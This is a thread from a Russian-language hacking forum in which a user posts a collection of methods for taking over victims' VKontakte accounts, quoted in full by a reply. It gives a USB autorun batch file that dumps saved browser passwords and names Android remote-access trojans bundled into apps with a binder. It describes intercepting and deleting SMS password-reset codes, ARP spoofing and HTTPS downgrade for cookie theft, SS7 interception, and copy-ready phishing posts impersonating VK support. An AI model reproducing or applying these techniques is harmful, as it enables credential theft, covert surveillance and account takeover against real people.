• VLMI - форум по обмену информацией. На форуме можете найти способы заработка, разнообразную информацию по интернет-безопасности, обмен знаниями, курсы/сливы.

    После регистрации будут доступны основные разделы.

    Контент форума создают пользователи, администрация за действия пользователей не несёт ответственности, отказ от ответственности. Так же перед использованием форума необходимо ознакомиться с правилами ресурса. Продолжая использовать ресурс вы соглашаетесь с правилами.
  • Подпишись на наш канал в Telegram для информации о актуальных зеркалах форума: https://t.me/vlmiclub

Альтернативные взломы ВК и не только

p0ena

P

p0ena

Участник
Сообщения
17
Реакции
24
0 руб.
Коротко и ясно выкладываю свои альтернативные способы получения доступа к ВК и не только(!) жертвы. Пароль на некоторые архивы:
Код: 
*CINH_HG"*^512_666_by>_
Некоторые способы взяты отовсюду - но только эффективные; Применяется СИ!
Нет ссылок только на паблик софт и то, что есть на гугл плее(для андроида). И так, как новый - буду рад симпе:3
Для просмотра содержимого вам необходимо авторизоваться.
Понятное дело, самое интересное это предпоследнее, но такая схема требует, скажем так, ВОЗМОЖНОСТЕЙ И СВЯЗЕЙ... Надеюсь, что данная информация будет полезна другим форумчанам :p Если что то надо прояснить - пишите и сразу сделаю отдельную тему(если вопрос стоящий).
 
Последнее редактирование:
Снифер для андроида. | SSL Regenenotiation или ложим сайт в одиночку[DDoS]

Forsed

F

Forsed

Новичок
Сообщения
1
Реакции
0
0 руб.
Интересно, надо будет провернуть такое. Много способов, своего рода сборник, автор молодец.
 

Shtein

S

Shtein

Участник
Сообщения
24
Реакции
17
0 руб.
p0ena написал(а):
Коротко и ясно выкладываю свои альтернативные способы получения доступа к ВК и не только(!) жертвы. Пароль на некоторые архивы:
Код: 
*CINH_HG"*^512_666_by>_
Некоторые способы взяты отовсюду - но только эффективные; Применяется СИ!
Нет ссылок только на паблик софт и то, что есть на гугл плее(для андроида). И так, как новый - буду рад симпе:3
  1. Если жертва из близкого окружения или с доступом к активному ПК
    - Нужна флешка! Используем Стиллер, логгер, приватный скрипт, или софт для восстановление паролей. Я использую BrowserPasswordDump (прилагается с инфой в текстовике)
    - Создаете *ваше название*.bat
    Код: 
    @echo off
start BrowserPasswordDump.exe -f log.txt
    - Создаёте Autorun.inf
    Код: 
    AutoRun
[AutoRun]
open="название батника"
    - Кидаете всё на флешку, и теперь используете её как вставил-вытянул

  2. Примерно так же, но с Трояном
    - Любой на ваш вкус, я юзаю для этого GiGa Logger (из-за функции УДАЛЕНИЯ ЛОКАЛЬНЫХ КУКОВ, что даст возможность потом всё сп*здить)
    - Через ту же флеху, при помощи СИ, чего угодно, закидываете троян. Удаляете куки. Ждете где то день. Скидываете логи себе через тот же троян.

  3. Через троян на Андроиде(при знании, скажем логина того же вк)
    -     На просторах интернета их немерено. Только там отдельная тема, скажу в общем, ибо кто знает - тот знает:) Я же юзаю AndroRat(Binder), или классику - AhMyth. Есть так же MobileTool, AirDroid. Кому как удобно.
    - Юзаем СИ, просим телеф и закачиваем, или подаём идею скачать что то, или по просьбе жертвы что то скачать - юзаем джойнер для склейки трояна и нужного apk , скачали - запустили.
    -
    ДОЖИДАЕМСЯ НОЧИ!!!
    За тем просто вбиваем факт того что мы забыли пароль. ЖЕРТВЕ приходит смс. Мы его видим. Берем код. Страница наша. Удаляем то смс что б не палить себя. Profit!
  4. П*здим сессию
    - Уже понятно что речь про сниффинг и ARP спуффинг. В помощь : Intercepter NG, IpScan, и вообще вся Kali Linux. Как работать с ними - гуглите.

  5. Подмена протоколов https на http (для вк)
    - По скольку теперь взломать вк через куки нельзя(не точно) - делаем так.
    - Для такой задачи так же подойдет Intercepter но есть достаточно аналогов(в том числе и на Android)
    а) Палим когда человек заходит на главную страницу, что бы ввести логин/пароль. (например после убития куки)
    б) В этой страницу меняем с https://login.vk.com.... на http://login.vk.com...
    в) Без всякого шифрования перехватываем куки.

  6. Если нам дали телефон(!) касается Token'а
    а) Заходим на сайт vk-messages.ru
    б) Жмем получить доступ, откроется новое окно, даем доступ приложению и копируем токен из адресной строки
    в) Вставляем на сайт в поле "Секретный URL" отправляем и нам дают код для входа на аккаунт

    Также можно восстанавливать удаленные сообщения. Дизайн конечно не айс, но читать можно.
    После смены пароля зайти уже не получится.


  7. Если нам дали телефон 2 (переписки вк)
    - На моменталочке:
    а) Вк - настойки - о приложении - жмем много раз
    б) Звонилка - набираем *#*#856682583#*#*
    в) Раздел *кэш* - скопировать БД на /sdcard
    г) Идем по пути который высветился(нужен эксплорер какой то) - Отправляем в Вк себе файл vk.db - удаляем отпавленое сообщение в телефоне жертвы. PROFIT!
  8. По подобию пункта №3 - атака на SS7 сеть(взято из годной темы на форуме про взлом Telegram'a)
    - Узнаем IMSI
    - Перерегистрируем абонента на наш терминал и получаем его профиль
    - Так же само как в том пункте > получаем ту смску с кодом для смены пароля
  9. ПолуСИ (нужен сайт-сниффер)
    - Для начала нам нужен фейковый аккаунт, можно приобрести самый дешёвый на любом сайте.
    - Заходим на аккаунт и создаём публичную страницу с названием «Aгeнт пoддepжки #123 (любые цифры)» или же «Тexничecкaя пoддepжкa VK».
    - На главное фото ставим:
    для агента поддержки
    3WEGG38IJYA.jpg

    для тех-поддержки
    vkontakte-256.png

    - Пишем пост на стене, но пока не размещаем
    для «Агента поддержки» :
    Код: 
    «Здpaвcтвyйтe!
*idномер айди|Имя Фамилия*, Bы пoдaли фopмy зaявки (№123) для измeнeния нoмepa тeлeфoна. Зaявкa бyдeт paccмoтpeнa в тeчeнии двyx чacoв.
Ecли этo были нe Bы, тo для oтмeны нeмeдлeннo пoдтвepдитe Baш aккayнт пo ccылкe – Ссылка с онлайн-сниффера (объясню ниже)
Ccылкa дeйcтвитeльнa в тeчeнии 10 минyт, пoслe этoго Baшa зaявкa нe мoжeт быть oтмeнeнa.
C yвaжeниeм, Кoмaндa пoддepжки BKoнтaктe.»
    для «Технической поддержки VK»:
    Код: 
    «3дpaвcтвуйте!
B cвязи c пocтyпившими жaлобaми нa Baшy cтpaницy Bкoнтaктe, нaм нeoбxoдимo yбeдитьcя, чтo Baшa cтpaницa нe являeтся фeйкoвoй.
Baм cpoчнo трeбyeтся пoдтвepдить свoй aккayнт для избeжания блoкиpoвки и пoтepи Baшиx личныx дaнныx.
*idномер айди|Имя Фамилия*
Baшa пepcoнaльнaя ccылкa для пoдтвepждeния – Ссылка с онлайн-сниффера (объясню ниже)
C yвaжeниeм, cлyжбa пoддepжки Bкoнтaктe.»
    b9eed922e4f24539ae00300b115ef295.png
    f2c3ccf8bd6e4a90905ef3964d3d9988.png

    - Теперь нужен сайт-сниффер. Ищите сами ибо их много(или же залейте на свой хост фейк страницы ввода логина-пароля, будет своего рода фишинг). В сниффере найдите фейк вк. Скопируйте ссылку.
    - Идем сюда vk.cc . Сокращаем ссылку. Идем по её адресу. Если забанили - сокращаем иначе или юзаем другой сократитель.
    - Когда готово вставляем эту ссылку в нужное место(писал же)

    - жертву лучше выбирать ту, которая сидит через мобильное приложение ВК.
    - не советую размещать сразу несколько постов на одной публичной странице! (за это быстро банят фейковый аккаунт)
    - идеальный вариант: 1 фейк – 1 «агент поддержки» - 1 «техническая поддержка», то есть одновременно охотимся за 2-мя жертвами.
    - чтобы ваш фейк не банили, при написании поста и имени публичной страницы заменяйте русские буквы на латинские (например: а,с,о,р).

    И в заключении, успешный взлом будет зависеть от Вашей фантазии, то есть какой текст Вы напишете и как оформите публичную страницу.

Понятное дело, самое интересное это последнее, но такая схема требует, скажем так, ВОЗМОЖНОСТЕЙ И СВЯЗЕЙ... Надеюсь, что данная информация будет полезна другим форумчанам :p Если что то надо прояснить - пишите и сразу сделаю отдельную тему(если вопрос стоящий).
Нажмите для раскрытия...
Хорошо всё описано, вот только авторан уже давно не робит
 
Войдите или зарегистрируйтесь для ответа.
Сверху Снизу